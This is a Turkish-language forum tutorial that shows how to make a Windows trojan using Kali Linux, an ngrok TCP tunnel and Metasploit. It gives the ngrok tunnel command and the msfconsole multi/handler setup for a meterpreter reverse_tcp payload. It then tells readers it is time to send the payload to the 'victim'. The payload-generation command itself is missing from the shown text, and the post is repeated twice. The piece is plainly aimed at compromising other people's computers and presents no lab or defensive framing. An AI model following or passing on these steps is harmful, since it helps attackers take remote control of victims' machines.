- 30 May 2019
- 102
- 22
Öncelikle merhaba arkadaşlar,
Bugün sizlerle başlıkta da belirttiğim gibi Kali linux kullanarak ngrok ile trojan oluşturmayı göstereceğim.
1-)İlk olarak NGROK kurulumu yapalım
NGROK'un sitesine girelim
Sonra
İndirmek için
Ngrok terminalden giriş yapma
2-)Payload oluşturma
Öncelikle
yazıyoruz(145 yerine istediğiniz portu yazın)
Portumuz açıldı
farkettiyseniz local ip adresim yerine ngrok'un bana vermiş olduğu 8.tcp.ngrok.io adresini kullanıp gene local port yerine ngrok'un bana vermiş olduğu 19348 portunu yazdım.
3-)Payload ayarlarını yapma ve dinleme işlemi
terminale msfconsole yazıp metaspolite giriyoruz ardından use exploit/multi/handler yazıp enter'a basıyoruz
ardından payloadımızı belirtiyoruz biz payloadı windows/meterpreter/reverse_tcp olarak belirtmiştik o yüzden set payload windows/meterpreter/reverse_tcp yazıp enter'a basıyoruz.
Artık ayarları yapalım show options yazıyoruz.
LHOST ve LPORT değişkenlerini değiştirmemiz lazım ama bunu bize ngrok'un verdiği IP lerle yapmıyoruz
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
en son run yazıyoruz
Payload dinlenmeye başladı şimdi kurbana atma zamanı
Oturum açtıktan sonra help yazarak komutları görebilirsiniz.
Eğer PC kapatıldığında payload dinleme işlemi ve oturumların kapanmasını istemiyorsanız
Sanal makinadan çıkarken suspend butonuna basın
İyi forumlar.
Bugün sizlerle başlıkta da belirttiğim gibi Kali linux kullanarak ngrok ile trojan oluşturmayı göstereceğim.
1-)İlk olarak NGROK kurulumu yapalım
NGROK'un sitesine girelim
Sonra
İndirmek için
Ngrok terminalden giriş yapma
2-)Payload oluşturma
Öncelikle
Kod:
./ngrok tcp 145
Portumuz açıldı
farkettiyseniz local ip adresim yerine ngrok'un bana vermiş olduğu 8.tcp.ngrok.io adresini kullanıp gene local port yerine ngrok'un bana vermiş olduğu 19348 portunu yazdım.
3-)Payload ayarlarını yapma ve dinleme işlemi
terminale msfconsole yazıp metaspolite giriyoruz ardından use exploit/multi/handler yazıp enter'a basıyoruz
ardından payloadımızı belirtiyoruz biz payloadı windows/meterpreter/reverse_tcp olarak belirtmiştik o yüzden set payload windows/meterpreter/reverse_tcp yazıp enter'a basıyoruz.
Artık ayarları yapalım show options yazıyoruz.
LHOST ve LPORT değişkenlerini değiştirmemiz lazım ama bunu bize ngrok'un verdiği IP lerle yapmıyoruz
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
en son run yazıyoruz
Payload dinlenmeye başladı şimdi kurbana atma zamanı
Oturum açtıktan sonra help yazarak komutları görebilirsiniz.
Eğer PC kapatıldığında payload dinleme işlemi ve oturumların kapanmasını istemiyorsanız
Sanal makinadan çıkarken suspend butonuna basın
İyi forumlar.
Son düzenleme: